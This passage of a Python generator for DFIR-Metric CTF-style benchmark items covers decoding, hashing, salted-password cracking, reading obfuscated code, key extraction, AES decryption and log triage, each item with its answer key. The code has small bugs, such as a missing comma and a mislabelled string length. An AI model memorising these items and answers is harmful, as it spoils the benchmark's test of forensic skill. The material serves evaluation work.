        """Challenge: Decode a string using different encodings"""

        def encode_base64(data):
            return base64.b64encode(data)

        def encode_base32(data):
            return base64.b32encode(data)

        def encode_hex(data):
            return base64.b16encode(data)

        def encode_base85(data):
            return base64.b85encode(data)

        def random_encode(data):
            encoders = [encode_base64, encode_base32, encode_hex, encode_base85]
            encoder = random.choice(encoders)
            return encoder(data)

        def generate_random_sentence():
            subjects = [
                "The cat",
                "A dog",
                "The man",
                "A woman",
                "The boy",
                "The girl",
                "A bird",
                "The car",
                "The teacher",
                "A student",
            ]
            verbs = [
                "jumps over",
                "runs across",
                "flies above",
                "drives past",
                "walks beside",
                "sits on",
                "looks at",
                "talks to",
                "listens to",
                "thinks about",
            ]
            objects = [
                "the fence",
                "the road",
                "the house",
                "the tree",
                "the bench",
                "the river",
                "the mountain",
                "the garden",
                "the building",
                "the computer",
            ]

            subject = random.choice(subjects)
            verb = random.choice(verbs)
            object = random.choice(objects)

            # Generate a somewhat random English sentence.
            sentence = f"{subject} {verb} {object}."
            return sentence

        solution = generate_random_sentence()
        rounds = random.randint(3, 20)
        data = solution.encode("ascii")
        for _ in range(rounds):
            data = random_encode(data)
        # Decode the final encoded bytes to a string (using 'ascii' or 'utf-8')
        data_str = data.decode("ascii")

        challenge_data = {
            "challenge": {
                "description": f"A single English sentence was encoded an unknown number of times using different encoding schemes. The final encoded output is: {data_str}",
                "instructions": f"Recover the original text. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original text</xml>'.",
                "answer": f"<xml>{solution}</xml>",
            },
        }
        return challenge_data

    def DFIR_38(self):
        """Challenge: Calculate the CRC32 Checksum"""

        def crc32_checksum(data):
            return f"{zlib.crc32(data.encode()):08x}".upper()

        # Generate a random string of length 20
        data = "".join(random.choices(string.ascii_letters + string.digits, k=20))
        checksum = crc32_checksum(data)

        challenge_data = {
            "challenge": {
                "description": f"Given a random string : {data}.",
                "instructions": "Calculate the  CRC-32/ISO-HDLC checksum of the provided string. Return the checksum as an uppercase hexadecimal string (e.g: 0D61024C). "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>checksum</xml>'.",
                "answer": f"<xml>{checksum}</xml>",

            },
        }
        return challenge_data

    def DFIR_39(self):
        """Challenge: Identify the hash algorithm and brute force the password."""

        # Generate a random 5-character string
        random_string = "".join(
            random.choices(string.ascii_letters + string.digits, k=5)
        )

        # Define hash functions
        hash_functions = {
            "MD5": hashlib.md5,
            "SHA1": hashlib.sha1,
            "SHA224": hashlib.sha224,
            "SHA256": hashlib.sha256,
            "SHA384": hashlib.sha384,
            "SHA512": hashlib.sha512,
            "SHA3_224": hashlib.sha3_224,
            "SHA3_256": hashlib.sha3_256,
            "SHA3_384": hashlib.sha3_384,
            "SHA3_512": hashlib.sha3_512,
            "BLAKE2s": hashlib.blake2s,
            "BLAKE2b": hashlib.blake2b,
        }

        # Randomly select a hash function
        hash_name, hash_func = random.choice(list(hash_functions.items()))
        hashed_string = hash_func(random_string.encode()).hexdigest()

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given a hashed string: {hashed_string}. The hash algorithm used is one of MD5, SHA1, SHA224, SHA256, SHA384, SHA512, SHA3_224, SHA3_256, SHA3_384, SHA3_512, BLAKE2s, BLAKE2b.",
                "instructions": "Identify the hash algorithm and recover the original 5-character password. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>algorithm,password</xml>'.",
                "answer": f"<xml>{hash_name},{random_string}</xml>",
            },
        }
        return challenge_data

    def DFIR_40(self):
        """Challenge: Substitution Cipher"""

        def generate_random_string(length=20):
            return "".join(
                random.choices(string.ascii_letters + string.digits, k=length)
            )

        def ascii_to_binary(data):
            return "".join(format(ord(c), "08b") for c in data)

        def substitute_binary(binary_str, hex0, hex1):
            return binary_str.replace("0", hex0).replace("1", hex1)

        random_string = generate_random_string()
        binary_string = ascii_to_binary(random_string)
        hex0 = random.choice("ABCDEFGHIJKLMMOPQRSTUVWXYZ")
        hex1 = random.choice("ABCDEFGHIJKLMMOPQRSTUVWXYZ")

        # Ensure hex0 and hex1 are different
        while hex0 == hex1:
            hex1 = random.choice("ABCDEFGHIJKLMMOPQRSTUVWXYZ")

        substituted_string = substitute_binary(binary_string, hex0, hex1)

        challenge_data = {
            "challenge": {
                "description": f"Given a 20-character random string that has been converted to binary and then a substitution cipher is applied. The substitution is: 0 -> {hex0}, 1 -> {hex1}.  The encrypted string is: '{substituted_string}'. ",
                "instructions": "Convert the given substitution cipher back to the original string. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_string</xml>'.",
                "answer": f"<xml>{random_string}</xml>",
            },
        }

        return challenge_data

    def DFIR_41(self):
        """Challenge: Random modifications to a 100-character string."""

        # Generate a random 200-character string
        original_string = "".join(
            random.choices(string.ascii_letters + string.digits, k=200)
        )
        modified_string = original_string

        # Define 20 possible instruction templates
        instruction_templates = [
            "Remove the last {num_chars_to_remove} characters.",
            "Delete the first {num_chars_to_remove} characters.",
            "Add {num_chars_to_add} '{random_char}' characters at the end.",
            "Insert {num_chars_to_add} '{random_char}' characters at the start.",
            "Replace the first {num_chars_to_remove} characters with {num_chars_to_add} '{random_char}' characters.",
            "Replace the last {num_chars_to_remove} characters with {num_chars_to_add} '{random_char}' characters.",
            "Duplicate each of the first {num_chars_to_add} characters individually.",
            "Duplicate each of the last {num_chars_to_add} characters individually."
            "Reverse the first {num_chars_to_remove} characters.",
            "Reverse the last {num_chars_to_remove} characters.",
            "Remove every second character.",
            "Remove every third character.",
            "Replace every second character with a '{random_char}' character.",
            "Replace every third character with a '{random_char}' character.",
            "Uppercase the first {num_chars_to_add} characters.",
            "Lowercase the last {num_chars_to_add} characters.",
        ]

        # Generate 20-30 random instructions to modify the string
        instructions = []
        num_instructions = random.randint(20, 30)
        for _ in range(num_instructions):
            # Randomly choose an instruction template
            template = random.choice(instruction_templates)

            # Determine number of characters to add/remove
            num_chars = random.randint(1, 10)
            random_char = random.choice(string.ascii_letters)
            instruction = template.format(
                num_chars_to_remove=num_chars,
                num_chars_to_add=num_chars,
                random_char=random_char,
            )
            instructions.append(instruction)

            # Apply the instruction
            if "Remove the last" in template:
                modified_string = modified_string[:-num_chars]
            elif "Delete the first" in template:
                modified_string = modified_string[num_chars:]
            elif "Add" in template and "end" in template:
                modified_string += random_char * num_chars
            elif "Insert" in template and "start" in template:
                modified_string = random_char * num_chars + modified_string
            elif "Replace the first" in template:
                modified_string = random_char * num_chars + modified_string[num_chars:]
            elif "Replace the last" in template:
                modified_string = modified_string[:-num_chars] + random_char * num_chars
            elif "Duplicate each of the first" in template:
                modified_string = (
                    modified_string[:num_chars] * 2 + modified_string[num_chars:]
                )
            elif "Duplicate each of the last" in template:
                modified_string = (
                    modified_string[:-num_chars] + modified_string[-num_chars:] * 2
                )
            elif "Reverse the first" in template:
                modified_string = (
                    modified_string[:num_chars][::-1] + modified_string[num_chars:]
                )
            elif "Reverse the last" in template:
                modified_string = (
                    modified_string[:-num_chars] + modified_string[-num_chars:][::-1]
                )
            elif "Remove every second" in template:
                modified_string = modified_string[::2]
            elif "Remove every third" in template:
                modified_string = "".join(
                    [char for i, char in enumerate(modified_string) if (i + 1) % 3 != 0]
                )
            elif "Replace every second" in template:
                modified_string = "".join(
                    [
                        char if (i + 1) % 2 != 0 else random_char
                        for i, char in enumerate(modified_string)
                    ]
                )
            elif "Replace every third" in template:
                modified_string = "".join(
                    [
                        char if (i + 1) % 3 != 0 else random_char
                        for i, char in enumerate(modified_string)
                    ]
                )
            elif "Uppercase the first" in template:
                modified_string = (
                    modified_string[:num_chars].upper() + modified_string[num_chars:]
                )
            elif "Lowercase the last" in template:
                modified_string = (
                    modified_string[:-num_chars] + modified_string[-num_chars:].lower()
                )

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given a 100-character random string, namely: '{original_string}'.",
                "instructions": f"Follow the instructions precisely and provide the final string solutions. Here are the instructions: {instructions}."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>final_string</xml>'.",
                "answer": f"<xml>{modified_string}</xml>",
            },
        }
        return challenge_data

    def DFIR_42(self):
        """Challenge: Using an obfuscated python function."""

        def overly_complicated_function(x):
            if x > 0:
                result = sum(int(digit) for digit in str(abs(x)))
            elif x < 0:
                result = -sum(int(digit) for digit in str(abs(x)))
            else:
                result = 0
            return result

        overly_complicated_function_string = """
        def f(OOOO00OO000O00000 ):
            if OOOO00OO000O00000 >0 :
                OO0OO00O00OO00O00 =sum (int (OOO00O000O0O0OO0O )for OOO00O000O0O0OO0O in str (abs (OOOO00OO000O00000 )))
            elif OOOO00OO000O00000 <0 :
                OO0OO00O00OO00O00 =-sum (int (O0O00000OO0000OOO )for O0O00000OO0000OOO in str (abs (OOOO00OO000O00000 )))#line:5
            else :
                OO0OO00O00OO00O00 =0
            return OO0OO00O00OO00O00
        """

        # Generate an input with 4 digits
        rand_int = random.choice(
            [random.randint(-10000000, -1000000), random.randint(1000000, 10000000)]
        )

        challenge_data = {
            "challenge": {
                "description": f"You are given this python function:\n ```{overly_complicated_function_string}```",
                "instructions": f"What would be the result if {rand_int} was the argument for that function?"
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>result</xml>'.",
                "answer": f"<xml>{overly_complicated_function(rand_int)}</xml>",
            },
        }
        return challenge_data

    def DFIR_43(self):
        """Challenge: Reversing an obfuscated python function."""

        def overly_complicated_function(s1, s2):
            # Step 1: Reverse both strings
            rev_s1 = s1[::-1]
            rev_s2 = s2[::-1]

            # Step 2: Concatenate the reversed strings with a delimiter
            concat_reversed = rev_s1 + "|" + rev_s2

            # Step 3: Increment ASCII value of each character by 1
            incremented_ascii = "".join(chr(ord(c) + 1) for c in concat_reversed)

            # Step 4: Base64 encode the resulting string
            encoded = base64.b64encode(incremented_ascii.encode()).decode()

            # Step 5: Reverse the Base64 encoded string
            reversed_encoded = encoded[::-1]

            # Step 6: Encode and reverse 3 more times
            for _ in range(3):
                reversed_encoded = base64.b64encode(reversed_encoded.encode()).decode()
                reversed_encoded = reversed_encoded[::-1]

            return reversed_encoded

        overly_complicated_function_string = """
        def f (OO00OOO0OOOO00O0O ,OO00OOOO0000OO00O ):
            O0O0O0000O0OO0O00 =OO00OOO0OOOO00O0O [::-1 ]
            OO0O00OO00OO00OO0 =OO00OOOO0000OO00O [::-1 ]
            OO0O0O00O0000OOO0 =O0O0O0000O0OO0O00 +"|"+OO0O00OO00OO00OO0
            OOO000OOO0O00OOOO =''.join (chr (ord (O00O00OOOOOOO00OO )+1 )for O00O00OOOOOOO00OO in OO0O0O00O0000OOO0 )
            OO0O000O00000000O =base64 .b64encode (OOO000OOO0O00OOOO .encode ()).decode ()
            O0O00OOO00OO0O00O =OO0O000O00000000O [::-1 ]
            for _OO0000O000O0000O0 in range (3 ):
                O0O00OOO00OO0O00O =base64 .b64encode (O0O00OOO00OO0O00O .encode ()).decode ()
                O0O00OOO00OO0O00O =O0O00OOO00OO0O00O [::-1 ]
            return O0O00OOO00OO0O00O
        """

        # Generate an input with 4 digits
        rand_string_1 = "".join(
            random.choices(string.ascii_letters + string.digits, k=10)
        )
        rand_string_2 = "".join(
            random.choices(string.ascii_letters + string.digits, k=10)
        )

        challenge_data = {
            "challenge": {
                "description": f"You are given this python function:\n ```{overly_complicated_function_string}```",
                "instructions": f"What are the arguments that produce the following result? '{overly_complicated_function(rand_string_1, rand_string_2)}'?"
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>['first_argument', 'second_argument']</xml>'.",
                "answer": f"<xml>{[rand_string_1, rand_string_2]}</xml>",
            },
        }
        return challenge_data

    def DFIR_44(self):
        """Challenge: Extracting a CSRF token from a login form."""

        # Generate a unique CSRF token
        csrf_token = random.getrandbits(128)

        # Define the Flask form HTML with a CSRF token
        form_html = f"""
        <!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <title>Login</title>
        </head>
        <body>
            <form method="post" action="/login">
                <input type="hidden" name="csrf_token" value="csrf_{csrf_token}">
                <label for="username">Username:</label>
                <input type="text" id="username" name="username">
                <label for="password">Password:</label>
                <input type="password" id="password" name="password">
                <button type="submit">Login</button>
            </form>
        </body>
        </html>
        """

        # Define the challenge and solution
        challenge_data = {
            "challenge": {
                "description": f"You are given a html login form:\n ```{form_html}```",
                "instructions": "Extract the CSRF token from the HTML form."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>csrf_token</xml>'.",
                "answer": f"<xml>csrf_{csrf_token}</xml>",
            },
        }
        return challenge_data

    def DFIR_45(self):
        """Challenge: Extract the secret key from a Flask app."""

        # Generate a unique secret key
        secret_key = "".join(random.choices(string.ascii_letters + string.digits, k=32))

        # Define the Flask app code with a secret key
        flask_app_code = f"""
        from flask import Flask

        app = Flask(__name__)
        app.secret_key = '{secret_key}'

        @app.route('/')
        def home():
            return "Welcome to the secure Flask app"

        if __name__ == '__main__':
            app.run(debug=True)
            """

        # Define the challenge and solution
        challenge_data = {
            "challenge": {
                "description": f"Given the Flask app code below:\n ```{flask_app_code}```",
                "instructions": "Find the secret key from the Flask app code. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>secret key</xml>'.",
                "answer": f"<xml>{secret_key}</xml>",
            },
        }
        return challenge_data

    def DFIR_46(self):
        """Challenge: Find the key in mysterious code."""
        ## Pyfuck code implementation copied from: https://github.com/wanqizhu/pyfuck/tree/master

        base = set("+travels[]'()")
        digits = {0: "+all([[]])", 1: "+all([])", 2: "all([])+all([])"}
        for i in range(3, 10):
            digits[i] = digits[i - 1] + digits[1]
        for i in range(0, 10):
            digits[i] = "(" + digits[i] + ")"

        DICT = {
            "c": "str(str)[+all([])]",  # 1
            "f": "str(eval)[eval(str(" + digits[1] + ")+str(" + digits[0] + "))]",  # 10
            "n": "str(eval)[" + digits[8] + "]",  # 8
            "o": "str(eval)[eval(str(" + digits[1] + ")+str(" + digits[6] + "))]",
            "u": "str(eval)[" + digits[2] + "]",
            "'": "str(str)[" + digits[7] + "]",
        }
        DICT["."] = "+".join(
            [
                "eval('str('",
                DICT["f"],
                "'l'",
                DICT["o"],
                "'at(" + digits[1] + "))[" + digits[1] + "]')",
            ]
        )  #'str(float(1))[1]'
        DICT["h"] = "+".join(
            [
                "eval('str(str'",
                DICT["."],
                DICT["c"],
                DICT["o"],
                DICT["u"],
                DICT["n"],
                "'t)[" + digits[4] + "]')",
            ]
        )  # str(str.count)[4]

        for i in DICT:
            assert i == eval(DICT[i]), (i, DICT[i])
        TMP = "\x01"  # substitute out single quotes

        def encode(s, with_eval=False):
            new_str = ""
            for c in s:
                # substitute for arbituary characters using chr()
                if not c.isdigit() and c not in base and c not in DICT:
                    new_str += "'+eval('chr(" + str(ord(c)) + ")')+'"
                else:
                    if c == "'":
                        new_str += "'+" + TMP + "+'"  # fix triple-quote issue
                    else:
                        new_str += c

            s = "'" + new_str + "'"

            new_str = ""
            for c in s:
                if c in base or c.isdigit() or c == TMP:
                    new_str += c
                else:
                    # substitute characters in DICT with base characters
                    if c in [".", "h"]:
                        new_str += "'+" + DICT[c] + "+'"
                    else:
                        new_str += "'+eval('" + DICT[c] + "')+'"

            s = new_str
            new_str = ""

            def repl(matchobj):
                i = matchobj.group(0)

                if i == "0":
                    return "(+all([[]]))"
                if i == "1":
                    return "(+all([]))"
                else:
                    return (
                        "'+"
                        + "+".join(["str(" + digits[int(j)] + ")" for j in i])
                        + "+'"
                    )

            s = re.sub("\d+", repl, s)
            s = s.replace(TMP, DICT["'"])

            s = s.replace("+''+", "+")
            if s[:3] == "''+":
                s = s[3:]
            if s[-3:] == "+''":
                s = s[:-3]

            return ("eval(" + s + ")") if with_eval else s

        def create_encoding(s):
            s_encoded = encode(s)
            assert set(s_encoded) <= base, set(s)
            assert eval("str(" + s_encoded + ")") == s, eval("str(" + s_encoded + ")")
            return "eval(" + s_encoded + ")"

        key = "".join(random.choices(string.ascii_letters, k=13))

        encoded = create_encoding(f"print('Your key is={key}')")

        challenge_data = {
            "challenge": {
                "description": f"You are given a mysterious code:\n ```{encoded}```",
                "instructions": "Find the hidden key in the code. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>secret_key</xml>'.",
                "answer": f"<xml>{key}</xml>",
            },
        }
        return challenge_data

    def DFIR_47(self):
        """Challenge: Get password from Flask source code and password hash leaks."""

        source_code = """
        ######### app.py #########

        from flask import Flask, render_template, request, redirect, url_for, flash
        import sqlite3
        import hashlib
        import os

        app = Flask(__name__)
        app.secret_key = 'supersecretkey'

        # Load salt from .salt file
        with open('.salt', 'r') as f:
            salt = f.read().strip()

            if len(salt) != 4:
                raise Exception("Salt length not equal to 4")

        # Initialize SQLite database
        def init_db():
            with sqlite3.connect('users.db') as conn:
                cursor = conn.cursor()
                cursor.execute('''
                    CREATE TABLE IF NOT EXISTS users (
                        id INTEGER PRIMARY KEY AUTOINCREMENT,
                        username TEXT UNIQUE NOT NULL,
                        password TEXT NOT NULL
                    )
                ''')
                conn.commit()

        init_db()

        @app.route('/')
        def index():
            return render_template('index.html')

        @app.route('/register', methods=['GET', 'POST'])
        def register():
            if request.method == 'POST':
                username = request.form['username']
                password = request.form['password']

                hashed_password = hashlib.sha256((password + salt).encode()).hexdigest()

                with sqlite3.connect('users.db') as conn:
                    cursor = conn.cursor()
                    try:
                        cursor.execute('INSERT INTO users (username, password) VALUES (?, ?)', (username, hashed_password))
                        conn.commit()
                        flash('Registration successful!', 'success')
                        return redirect(url_for('login'))
                    except sqlite3.IntegrityError:
                        flash('Username already exists.', 'error')

            return render_template('register.html')

        @app.route('/login', methods=['GET', 'POST'])
        def login():
            if request.method == 'POST':
                username = request.form['username']
                password = request.form['password']

                hashed_password = hashlib.sha256((password + salt).encode()).hexdigest()

                with sqlite3.connect('users.db') as conn:
                    cursor = conn.cursor()
                    cursor.execute('SELECT * FROM users WHERE username = ? AND password = ?', (username, hashed_password))
                    user = cursor.fetchone()

                    if user:
                        flash('Login successful!', 'success')
                        return redirect(url_for('index'))
                    else:
                        flash('Invalid credentials.', 'error')

            return render_template('login.html')

        if __name__ == '__main__':
            app.run(debug=True)

        ####### app.py #########

        ####### index.html ########
        <!doctype html>
        <html lang="en">
        <head>
            <meta charset="utf-8">
            <title>Index Page</title>
        </head>
        <body>
            <h1>Welcome to the Index Page</h1>
            <a href="{{ url_for('register') }}">Register</a> |
            <a href="{{ url_for('login') }}">Login</a>
        </body>
        </html>

        ####### index.html ########

        ####### login.html ########
        <!doctype html>
        <html lang="en">
        <head>
            <meta charset="utf-8">
            <title>Login</title>
        </head>
        <body>
            <h1>Login</h1>
            <form method="POST" action="{{ url_for('login') }}">
                <label for="username">Username:</label>
                <input type="text" id="username" name="username" required><br>
                <label for="password">Password:</label>
                <input type="password" id="password" name="password" required><br>
                <button type="submit">Login</button>
            </form>
            <a href="{{ url_for('index') }}">Back to Index</a>
            {% with messages = get_flashed_messages(with_categories=true) %}
                {% if messages %}
                    <ul>
                    {% for category, message in messages %}
                        <li class="{{ category }}">{{ message }}</li>
                    {% endfor %}
                    </ul>
                {% endif %}
            {% endwith %}
        </body>
        </html>

        ####### login.html ########

        ####### register.html ########
        <!doctype html>
        <html lang="en">
        <head>
            <meta charset="utf-8">
            <title>Register</title>
        </head>
        <body>
            <h1>Register</h1>
            <form method="POST" action="{{ url_for('register') }}">
                <label for="username">Username:</label>
                <input type="text" id="username" name="username" required><br>
                <label for="password">Password:</label>
                <input type="password" id="password" name="password" required><br>
                <button type="submit">Register</button>
            </form>
            <a href="{{ url_for('index') }}">Back to Index</a>
            {% with messages = get_flashed_messages(with_categories=true) %}
                {% if messages %}
                    <ul>
                    {% for category, message in messages %}
                        <li class="{{ category }}">{{ message }}</li>
                    {% endfor %}
                    </ul>
                {% endif %}
            {% endwith %}
        </body>
        </html>

        ####### register.html ########

        """

        salt = "".join(random.choices(string.ascii_letters + string.digits, k=4))

        admin_password = "".join(
            random.choices(string.ascii_letters + string.digits, k=4)
        )

        bob_password = "".join(
            random.choices(string.ascii_letters + string.digits, k=4)
        )

        leaked_hashes = [
            ("admin", hashlib.sha256((admin_password + salt).encode()).hexdigest()),
            ("bob", hashlib.sha256((bob_password + salt).encode()).hexdigest()),
            ("hanna", hashlib.sha256(("hanna" + salt).encode()).hexdigest()),
        ]

        challenge_data = {
            "challenge": {
                "description": f"You registered to a website with the username: hanna and password: hanna. You found some leaked hashed passwords including yours: {leaked_hashes}. You have access to the source code of the website:\n ```{source_code}```",
                "instructions": "What is the password for the user admin? Rumor has it that he uses a password consisting of ascii letters and digits with a length of 4. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>admin_password</xml>'.",
                "answer": f"<xml>{admin_password}</xml>",
            },
        }
        return challenge_data
    def DFIR_48(self):
        """Challenge: Find the key in the PNG image"""
        random_string = "".join(random.choices(string.ascii_uppercase, k=10))

        # Create an image with white background
        img = Image.new("RGB", (100, 50), color=(255, 255, 255))
        d = ImageDraw.Draw(img)

        # Load a font and draw the text
        try:
            font = ImageFont.truetype("arialbd.ttf", 120)
        except IOError:
            font = ImageFont.load_default()

        d.text((20, 20), random_string, font=font, fill=(0, 0, 0))

        # Save the image to a bytes buffer
        buffer = io.BytesIO()
        img.save(buffer, format="PNG")
        buffer.seek(0)

        # Save image to a file
        image_file_path = "test.png"
        img.save(image_file_path, format="PNG")

        # Base64 encode the image
        encoded_image = base64.b64encode(buffer.read()).decode()
        try:
            if os.path.exists("test.png"):
                os.remove("test.png")
        except OSError:
            pass  # Silently handle the error
        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given a base64 encoded image string : {encoded_image}",
                "instructions": "Decode the base64 string and extract the text written in the image. "
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>extracted text</xml>'.",
                "answer": f"<xml>{random_string}</xml>",
            },
        }
        return challenge_data

    def DFIR_49(self):
        """Challenge: AES-128 ECB decryption of a given encrypted message."""

        # Generate a random 128-bit AES key
        aes_key = os.urandom(16)  # 128 bits are 16 bytes
        hex_aes_key = binascii.hexlify(
            aes_key
        ).decode()  # Convert key to hexadecimal format

        # Setup AES in ECB mode
        cipher = AES.new(aes_key, AES.MODE_ECB)

        # Prepare a plaintext message to encrypt
        plaintext = "".join(random.choices(string.ascii_letters + string.digits, k=16))
        plaintext_bytes = plaintext.encode()

        # Encrypt the plaintext
        encrypted_message = cipher.encrypt(plaintext_bytes)
        base64_encrypted_message = base64.b64encode(encrypted_message).decode()

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given an encrypted AES-128 ECB message, namely {base64_encrypted_message}.",
                "instructions": f"Decrypt the message with the key {hex_aes_key} and return with the plaintext."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>plaintext</xml>'.",
                "answer": f"<xml>{plaintext}</xml>",
            },
        }
        return challenge_data

    def DFIR_50(self):
        """Challenge: Identify IP addresses to block based on excessive failed login attempts."""

        # Function to generate random usernames
        def generate_username():
            return "".join(random.choices(string.ascii_letters, k=random.randint(5, 6)))

        # Function to generate random IP addresses
        def generate_ip():
            return ".".join(str(random.randint(1, 255)) for _ in range(4))

        # Function to generate random timestamps
        def generate_timestamp():
            return f"2024-{random.randint(1,12):02}-{random.randint(1,28):02} {random.randint(0,23):02}:{random.randint(0,59):02}:{random.randint(0,59):02}"

        # Generate a list of random usernames and IP addresses
        usernames = [generate_username() for _ in range(5)]
        ip_addresses = [generate_ip() for _ in range(5)]

        # Map each username to a unique IP address
        user_ip_mapping = {user: ip for user, ip in zip(usernames, ip_addresses)}

        # Generate random log entries
        logs = []
        failed_attempts = Counter()

        while True:
            user = random.choice(usernames)
            ip = user_ip_mapping[user]
            action = "failed" if random.random() > 0.5 else "successful"

            if action == "failed":
                failed_attempts[(user, ip)] += 1

            log = f"{generate_timestamp()} Login {action} for user {user} from IP {ip}"
            logs.append(log)

            if any(count >= 3 for count in failed_attempts.values()):
                break

        random.shuffle(logs)
        logs_string = "\n".join(logs)
        # Detect the correct IP and username pairs to block
        ip_user_to_block = [
            (user, ip) for (user, ip), count in failed_attempts.items() if count >= 3
        ]

        # Ensure only one user-IP pair is in the solution
        ip_user_to_block = ip_user_to_block[:1]

        # Format the solution without quotes around user and IP
        formatted_solution = str([(user, ip) for user, ip in ip_user_to_block]).replace(
            "'", ""
        )

        challenge_data = {
            "challenge": {
                "description": f"Given the following server logs:\n ```{logs_string}```\nIdentify the IP and username pairs to block based on excessive failed login attempts (at least 3 failed login attempts).",
                "instructions": "Return the IP and username pairs to block."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>[(user, IP)]</xml>'.",
                "answer": f"<xml>{formatted_solution}</xml>",
            },
        }

        return challenge_data


    def generate_json(self, num_challenges=100, k=10):
          """Generate JSON for a specific number of challenges, each repeated k times."""
          final_challenges = []
          total_instances = num_challenges * k  # Total number of instances to generate

          # Use tqdm progress bar for generating challenges
          with tqdm(
              total=total_instances, desc="Generating Challenges", unit="challenge"
          ) as pbar:
              for idx, method in enumerate(
                  self.get_challenge_methods()[:num_challenges], start=1
              ):
                  for instance in range(1, k + 1):
                      # Call the method for each instance to ensure different outputs
                      challenge = method()

                      # Add "Q template" and "instance" inside the challenge dictionary
                      new_challenge = {
                          **challenge,
                          "challenge": {
                              "template_id": idx,  # Template challenge number
                              "instance": instance,  # Instance number for repeated challenges
                              **challenge[
                                  "challenge"
                              ],  # Keeping the existing challenge structure
                          },
                      }
                      # Add GENERAL_PROMPT to the description
                      new_challenge["challenge"]["description"] = (
                          self.GENERAL_PROMPT + new_challenge["challenge"]["description"]
                      )
                      final_challenges.append(new_challenge)

                      # Update the progress bar
                      pbar.update(1)

          json_output = json.dumps({
                  "dataset": "DFIR-Metric Dataset (Module II CTF-style challenges)",
                  "authors":"Bilel Cherif, Aaesha Aldahmani, Saeed Alshehhi, Tamas Bisztray, Richard A. Dubniczky, and Norbert Tihanyi",
                  "sources": "https://github.com/DFIR-Metric",
                  "template_count": num_challenges,
                  "k": k,
                  "instance_count": num_challenges * k,
                  "generated_at": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                  "questions": final_challenges,
              }, indent=4)
          return json_output

    def save_to_file(self, k=10):
          """Save the generated challenges to a file named 'DFIR-Metric-CTF.json'."""
          num_challenges = len(self.get_challenge_methods())  # Dynamically count DFIR_x methods
          json_data = self.generate_json(num_challenges=num_challenges, k=k)

          # Assuming json_data is a dictionary. If it's a JSON string, convert it back to a dictionary first
          if isinstance(json_data, str):
              json_data = json.loads(json_data)

          # Save the dictionary to a JSON file with special character support
          with open("DFIR-Metric-CTF.json", "w", encoding="utf-8") as file:
              json.dump(json_data, file, ensure_ascii=False, indent=4)

          print("[*] Data has been saved to DFIR-Metric-CTF.json.")

    def get_challenge_methods(self):
          """Retrieve all challenge methods in sorted order by their number."""
          return sorted(
              [
                  getattr(self, method)
                  for method in dir(self)
                  if method.startswith("DFIR_")
              ],
              key=lambda x: int(x.__name__.split("_")[1]),
          )



generator = DFIR_Metric_CTF()
generator.save_to_file(k=3)  # Generate 3 instances of each challenge and save to file

Generating Challenges: 100%|██████████| 150/150 [00:02<00:00, 57.37challenge/s]

[*] Data has been saved to DFIR-Metric-CTF.json.
